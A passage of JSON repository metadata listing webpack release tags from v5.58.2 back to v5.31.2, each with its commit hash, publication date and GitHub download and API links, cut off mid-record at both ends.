9:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g